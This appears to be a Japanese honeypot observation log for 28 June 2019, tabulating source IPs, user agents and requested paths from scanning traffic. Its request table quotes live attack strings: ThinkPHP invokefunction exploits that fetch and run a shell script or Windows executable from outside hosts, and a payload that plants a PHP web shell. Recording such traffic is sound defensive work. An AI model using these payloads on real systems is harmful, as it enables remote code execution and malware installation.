ハニーポット(仮) 観測記録 2019/06/28分です。
アクセス数は変わらず少ないですが thinkPHPの脆弱性狙いで exeダウンロード、実行をしようとしている動きが確認できました。
総アクセス数:39 (前日比:+27)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 4 | 104.160.160.10 | United |
| 1 | 106.14.29.3 | China |
| 3 | 111.93.34.178 | India |
| 4 | 114.67.232.237 | China |
| 4 | 220.197.219.214 | China |
| 1 | 222.94.195.236 | China |
| 12 | 223.112.190.70 | China |
| 1 | 2.49.221.219 | United |
| 2 | 47.254.156.108 | Germany |
| 1 | 47.93.12.132 | China |
| 1 | 60.191.52.254 | China |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 66.240.205.34 | United |
| 2 | 82.209.201.182 | Belarus |
| 1 | 85.14.245.154 | Germany |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 3 | Go-http-client/1.1 |
| 3 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
| 1 | Mozilla/5.0 |
| 2 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
| 10 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 12 | ZmEu |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=wget%20http://81[.]6[.]42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; | HTTP/1.1 |
| 1 | GET | /Login.htm | HTTP/1.1 |
| 2 | GET | /manager/html | HTTP/1.1 |
| 2 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid[.]hognoob[.]se/download.exe','%SystemRoot%/Temp/yyupkiebutpnkje7809.exe');start%20%SystemRoot%/Temp/yyupkiebutpnkje7809.exe | HTTP/1.1 |
| 1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid[.]hognoob[.]se/download.exe','%SystemRoot%/Temp/yyupkiebutpnkje7809.exe');start%20%SystemRoot%/Temp/yyupkiebutpnkje7809.exe | HTTP/1.1 |
| 1 | GET | /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php | HTTP/1.1 |
| 1 | GET | /smb_scheduler/ | HTTP/1.1 |
| 3 | GET | /TP/index.php | HTTP/1.1 |
| 3 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 4 | GET | /TP/public/index.php | HTTP/1.1 |
| 2 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 1 | GET | /webdav/ | HTTP/1.1 |
| 1 | Gh0st\xad | ||
| 1 | HEAD | / | HTTP/1.1 |
| 3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
| 1 | PROPFIND | / | HTTP/1.1 |
| 1 | \x03 |
